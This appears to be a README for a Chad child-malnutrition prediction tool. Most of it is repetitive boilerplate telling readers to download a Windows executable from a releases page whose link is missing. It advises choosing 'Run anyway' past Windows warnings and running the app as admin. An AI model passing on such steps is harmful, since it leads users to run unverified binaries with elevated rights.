Chad-malnutrition-prediction helps estimate the risk of child malnutrition in Chad using survey data from DHS 2014.
It uses a machine learning model built for public health analysis. The model was tested on 9,826 children and reached 92% accuracy and an AUC of 0.979.
The app is useful if you want a simple way to review child nutrition risk data without setting up a full data science tool chain.
Visit the release page to download and run this file:
On that page, look for the latest release and download the Windows file attached to it.
Before you start, make sure you have:
- A Windows PC
- An internet connection
- Enough free disk space for the app and data files
- Permission to save and open downloaded files
If the release includes a zipped folder, you will also need the built-in Windows unzip tool or a file extractor.
- Open the Releases page
- Find the newest release at the top
- Download the file for Windows
- If the file is in a
.zipfolder, right-click it and choose Extract All - Open the extracted folder
- Double-click the app file to start it
- If Windows asks for permission, choose Run anyway if you trust the source
- Wait for the app to load, then follow the on-screen steps
If the release includes an installer, open the installer file and follow the prompts until setup ends.
The app uses child and household survey data to estimate malnutrition risk. It is based on common public health signals such as:
- Age
- Weight and growth indicators
- Household context
- Nutrition-related survey fields
- Child health factors from DHS data
The model uses gradient boosting, which combines many small decision rules to make one prediction.
Child malnutrition is a serious public health issue in Chad. The project is built around a real need: helping people spot risk patterns from survey data.
The repository focuses on:
- Child health
- Nutrition
- Machine learning
- Public health analysis
- African health data
- Chad and Sahel region context
This app is built for end users who want to:
- Review malnutrition risk predictions
- Explore child health data
- Support nutrition research
- Work with DHS-based survey results
- Use a simple Windows program instead of a full coding setup
A Windows release may include items like:
.exeapp file.ziparchiveREADMEor setup notes- Data folder
- Results folder
- Model file
If you see several files, start with the one marked as the main app or installer.
After you open the app:
- Load the provided data file, if the app asks for one
- Choose the child record or survey set you want to review
- Start the prediction step
- View the risk result on screen
- Save or copy the output if needed
If the app gives you a report, the result may show a risk score or a class label such as low, medium, or high risk.
- Use the latest release
- Keep all files in the same folder
- Do not rename files unless the release notes tell you to
- If the app closes when you click it, try running it again as admin
- If Windows blocks the file, check the download came from the release page
- If a folder contains both data and model files, leave them together
- Repository: Chad-malnutrition-prediction
- Domain: child nutrition and public health
- Country focus: Chad
- Data source: DHS 2014 survey data
- Model type: gradient boosting
- Reported performance: 92% accuracy, 0.979 AUC
- Sample size: 9,826 children
- Topic areas: Africa, Chad, child health, machine learning, malnutrition, nutrition, public health, Python, Sahel, XGBoost
Yes. The release page is the main place to download the Windows version.
No. You only need to download the file and open it on your PC.
Choose the newest Windows file in the latest release. If there is an installer, use that first.
If all needed files are inside the release, the app may run offline after you download it.
Use the included data file or follow the files in the release folder.
Visit the Releases page to download
A typical folder may look like this:
Chad-malnutrition-prediction.exedatamodelsoutputREADME.md
Keep the folder structure as it is when you open the app
- Open the release link
- Check that the repository name matches this project
- Download the latest Windows file
- Save it to a folder you can find later
- Open the file from that folder
- If the file is zipped, extract it first
- Run the app from the extracted folder